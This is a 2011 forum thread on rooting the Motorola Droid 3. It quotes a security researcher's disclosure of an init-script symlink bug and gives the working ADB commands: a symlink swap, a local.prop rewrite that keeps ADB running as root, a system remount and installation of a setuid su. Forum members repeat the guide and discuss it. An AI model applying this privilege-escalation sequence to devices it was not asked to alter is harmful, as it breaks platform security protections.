[How To:] Root Your Droid 3

[pc747]

Droid 3 possibly rooted

Security Research by Dan Rosenberg

Have any one tried this:

Rooting the Droid 3

The Motorola Droid 3 was released July 14, 2011, and has no public technique available to get root access. On request of some members of the Android community, I decided to audit the platform in order to root the device.
The Bug

I identified a vulnerability specific to Motorola devices in the script parsed by the init thread (this is existing code, not commands for you to run):

mkdir /data/local 0771 mot_tcmd shell mkdir /data/local/tmp 0771 mot_tcmd shell mkdir /data/local/12m 0771 mot_tcmd shell mkdir /data/local/12m/batch 0771 mot_tcmd shell chown mot_tcmd shell /data/local chown mot_tcmd shell /data/local/12m chown mot_tcmd shell /data/local/12m/batch chown mot_tcmd shell /data/local/tmp Since the contents of /data/local are group “shell” and group-writable, we can modify the contents of this directory using ADB. By logging into the device and replacing one of the sub-directories listed here with a symbolic link, then when the device reboots it will change the ownership of the symlink target to group “shell”. This can be used to edit property files to manipulate the behavior of ADB to achieve root.
So, without further ado:
The Exploit

Log in to the device using “adb shell” and type the following commands:

mv /data/local/12m /data/local/12m.bak ln -s /data /data/local/12m Next, physically reboot the device by pressing the power button. When it wakes up, log in using “adb shell” again, and type the following:

rm /data/local/12m mv /data/local/12m.bak /data/local/12m mv /data/local.prop /data/local.prop.bak echo "ro.sys.atvc_allow_netmon_usb=0" > /data/local.prop echo "ro.sys.atvc_allow_netmon_ih=0" >> /data/local.prop echo "ro.sys.atvc_allow_res_core=0" >> /data/local.prop echo "ro.sys.atvc_allow_res_panic=0" >> /data/local.prop echo "ro.sys.atvc_allow_all_adb=1" >> /data/local.prop echo "ro.sys.atvc_allow_all_core=0" >> /data/local.prop echo "ro.sys.atvc_allow_efem=0" >> /data/local.prop echo "ro.sys.atvc_allow_bp_log=0" >> /data/local.prop echo "ro.sys.atvc_allow_ap_mot_log=0" >> /data/local.prop echo "ro.sys.atvc_allow_gki_log=0" >> /data/local.prop The ro.sys.atvc_allow_all_adb property is a Motorola-specific configuration that prevents ADB from dropping its root privileges. Reboot the device one final time, and on logging in with “adb shell”, you should be presented with a root prompt. Enjoy!
Thanks to mkultramega, Toaday, and zdooder for testing, KrazyKrivda for raising funds, scottml and Edgan for bouncing ideas, and rweb for convincing me to look at Droid 3 in the first place.

Below is a method posted by woodyman along with the zip file for su.

[h=2]

[How To:] Root Your Droid 3[/h]

First I want to say I CAN NOT take credit for this nor will I post the full details because they have already been posted, so without further delay, here is a nice simple guide for all of you on how to root your precious Droid 3!

-------------------------

1. Head here and read thorough this once so you at least semi-understand what's going on!
2. If you don't have ADB installed and setup, then do a quick search for a guide there are multiple out there and most are quite good. You can also set it up following the directions straight from Google, but they are a bit complicated if your not entirely sure about this stuff. Android SDK | Android Developers
3. After that, then head HERE again and follow his instructions.
4. At the end when you get the # symbol in ADB for root then you will need to do the following..
5. Download the 2 attached files and save to your desktop
6. First you need to write the system partition as RW so you can write things to it in order to get a permanent root.
7. SO run the following command.
8. Code:
   
   mount -o rw,remount /dev/block/system /system
9. Next copy the 2 attached files from your desktop to the perspective directories on your Droid 3
10. For example my commands where as follows:

Code:

adb push '/home/woodyman/Desktop/su' /system/xbin adb push '/home/woodyman/Desktop/Superuser.apk' /system/appadb shell chmod 4755 /system/xbin/su

---------------------------
This way done using linux, [Ubuntu 11.04] So commands will be a bit different with windows..

This is just a rough quick sketch up for everyone, I will refine it and add more details tonight, I Just wanted to get it up for now so everyone had the chance if they wanted.​

Attached Files

• 
  su.zip* (127.2 KB, 3 views)

 

[Mungo Baobab]

Droid 3 rooted--- Details to follow

Gang, Droid-Life is reporting that our beloved Droid 3 has been rooted. They (we) are waiting for official photo's. If its so, Mungo is dancing the Gig!!

See link from XDA. HAY Djrblis!!

http://vulnfactory.org/blog/2011/08/...g-the-droid-3/

Go team Go.

 

[km75]

I just posted a thread on this. Would love to try it out. Can you tell me what is meant by logging in using "adb shell"?

Sent from my DROID3 using DroidForums

 

[pc747]

adb shell is a command used via android debug bridge. [video=youtube;uVU8vQVKo6I]http://www.youtube.com/watch?v=uVU8vQVKo6I&feature=related[/video]

 

[leobg]

Huh, anybody tried that yet?

Edit: yes - it has been confirmed it works by people I trust

Congrats community!

 

[km75]

adb shell is a command used via android debug bridge. [video=youtube;uVU8vQVKo6I]http://www.youtube.com/watch?v=uVU8vQVKo6I&feature=related[/video]

Thanks man. Going to give it a try.

Sent from my DROID3 using DroidForums

 

[ACalcutt]

This is just adb root right? we still need to push su and superuser.apk to the phone with adb? Figures I just reinstalled my laptop....now i need to set up adb again.

EDIT: I'm guessing I want to push the su and superuser from here ( http://forum.xda-developers.com/showthread.php?t=682828 )

 

[woodyman]

First I want to say I CAN NOT take credit for this nor will I post the full details because they have already been posted, so without further delay, here is a nice simple guide for all of you on how to root your precious Droid 3!

-------------------------

1. Head here and read thorough this once so you at least semi-understand what's going on!
2. If you don't have ADB installed and setup, then do a quick search for a guide there are multiple out there and most are quite good. You can also set it up following the directions straight from Google, but they are a bit complicated if your not entirely sure about this stuff. Android SDK | Android Developers
3. After that, then head HERE again and follow his instructions.
4. At the end when you get the # symbol in ADB for root then you will need to do the following..
5. Download the 2 attached files and save to your desktop
6. First you need to write the system partition as RW so you can write things to it in order to get a permanent root.
7. SO run the following command.

8. mount -o rw,remount /dev/block/system /system

9. Next copy the 2 attached files from your desktop to the perspective directories on your Droid 3
10. For example my commands where as follows:

adb push '/home/woodyman/Desktop/su' /system/xbin 
adb push '/home/woodyman/Desktop/Superuser.apk' /system/app
adb shell 
chmod 4755 /system/xbin/su

---------------------------
This way done using linux, [Ubuntu 11.04] So commands will be a bit different with windows..

This is just a rough quick sketch up for everyone, I will refine it and add more details tonight, I Just wanted to get it up for now so everyone had the chance if they wanted.

 

[Pleirosei]

Makes me want to but the phone, but its 3g. Frownz

Jesus is the Christ

 

[pc747]

merged threads.

 

[woodyman]

I posted separate so it would be the first message any way you can rearrange so that that is closer to the top, the main reason I made the thread is because he talks you through how to get TEMP ROOT so after that there is no more instruction which is why I made the thread to provide more instruction so the average person knows what to do next in order to get a permanant root

Just aiming to keep things uncluttered was all.

merged threads.

 

[leobg]

First I want to say I CAN NOT take credit for this nor will I post the full details because they have already been posted, so without further delay, here is a nice simple guide for all of you on how to root your precious Droid 3!

-------------------------

1. Head here and read thorough this once so you at least semi-understand what's going on!
2. If you don't have ADB installed and setup, then do a quick search for a guide there are multiple out there and most are quite good. You can also set it up following the directions straight from Google, but they are a bit complicated if your not entirely sure about this stuff. Android SDK | Android Developers
3. After that, then head HERE again and follow his instructions.
4. At the end when you get the # symbol in ADB for root then you will need to do the following..
5. Download the 2 attached files and save to your desktop
6. First you need to write the system partition as RW so you can write things to it in order to get a permanent root.
7. SO run the following command.

8. mount -o rw,remount /dev/block/system /system

9. Next copy the 2 attached files from your desktop to the perspective directories on your Droid 3
10. For example my commands where as follows:

adb push '/home/woodyman/Desktop/su' /system/xbin 
adb push '/home/woodyman/Desktop/Superuser.apk' /system/app

---------------------------
This way done using linux, [Ubuntu 11.04] So commands will be a bit different with windows..

This is just a rough quick sketch up for everyone, I will refine it and add more details tonight, I Just wanted to get it up for now so everyone had the chance if they wanted.

Doesn't su require suid permissions to be set? 4755 to be exact?

 

[NoBloatware]

Makes me want to but the phone, but its 3g. Frownz

No thanks. LTE burns battery and 3G is fast enough to make me happy. If the phone had 4G I'd probably have it off all of the time. Also, it would make the phone bulkier.

 

[dracos]

yes ensure you do a chmod 4755 /system/xbin/su

I now have Titanium installed and running backups. I just have to get a list of the apps I need to boot off

 

[Pleirosei]

Has 4g been bad on every 4g device?

Jesus is the Christ